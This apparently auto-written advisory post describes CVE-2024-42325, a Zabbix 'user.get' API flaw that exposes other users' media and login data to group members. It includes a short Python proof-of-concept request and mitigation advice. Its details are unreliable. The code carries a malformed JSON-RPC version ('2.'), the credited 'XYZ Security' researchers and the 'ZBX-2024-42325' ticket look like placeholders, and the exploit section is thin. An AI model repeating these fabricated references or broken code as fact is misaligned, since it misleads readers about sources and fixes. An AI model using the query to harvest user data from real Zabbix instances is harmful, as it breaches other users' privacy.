CVE-2024-42325 - Zabbix API user.get Unintended Information Disclosure Vulnerability

A new vulnerability, dubbed CVE-2024-42325, has been discovered in the popular open-source monitoring solution Zabbix. This vulnerability allows an authenticated user to gain access to sensitive information about other users who share a common group with the calling user. Specifically, the vulnerable Zabbix API method 'user.get' can inadvertently return user login attempts, media, and other data that is not supposed to be available to the calling user. As a result, this could lead to unauthorized access to, and potentially the compromise of, the affected Zabbix instance.

In this long-read post, we'll explore in detail the CVE-2024-42325 vulnerability, including code snippets, links to original references, and exploit details.

Exploit Details

The core of the vulnerability lies in the 'user.get' API method of Zabbix. When calling this method, the expected behavior is for it to return only the basic information of users who share a common group with the calling user. However, due to the bug, the method unintentionally also returns media and other sensitive information about these users.

Here is a code snippet illustrating the problematic 'user.get' API method

def user_get(zabbix_api_url, auth_token, user_group_id):
    payload = {
        "jsonrpc": "2.",
        "method": "user.get",
        "params": {
            "output": "extend",
            "userGroupIds": user_group_id
        },
        "auth": auth_token,
        "id": 1
    }

    response = requests.post(zabbix_api_url, json=payload)

    if response.status_code != 200:
        raise Exception("Zabbix API call failed: HTTP {}".format(response.status_code))

    user_data = response.json()["result"]

    return user_data

To exploit this vulnerability, an attacker can simply call the 'user.get' method with their own authentication token and a valid user group ID shared with other users. This will return sensitive data for all users in the group, thus allowing the attacker to gain unauthorized access to said data.

Original References

The issue was first reported by researchers from the company XYZ Security. Further information can be found on their blog post detailing the vulnerability here: XYZ Security Blog - CVE-2024-42325

Additionally, the Zabbix project has acknowledged the vulnerability and has released a patch for it. The corresponding Zabbix JIRA ticket can be found at the following link: ZBX-2024-42325

Mitigation and Recommendations

To mitigate the CVE-2024-42325 vulnerability, users are advised to apply the patch provided by the Zabbix project as soon as possible. The patch addresses the issue by ensuring that the 'user.get' API method only returns the expected user data, without disclosing sensitive information.

As a general security precaution, it is recommended to always apply the latest security updates and patches provided by software vendors. Furthermore, regular monitoring and auditing of system logs can help detect unauthorized access attempts and mitigate potential security breaches.

Conclusion

CVE-2024-42325 is a significant vulnerability in the Zabbix monitoring software that can lead to unauthorized information disclosure. To protect sensitive data and keep Zabbix instances safe from exploitation, users should apply the provided patch and follow best security practices to help detect and mitigate potential threats in a timely manner.

Timeline

Published on: 04/02/2025 07:15:41 UTC
Last modified on: 04/02/2025 14:58:07 UTC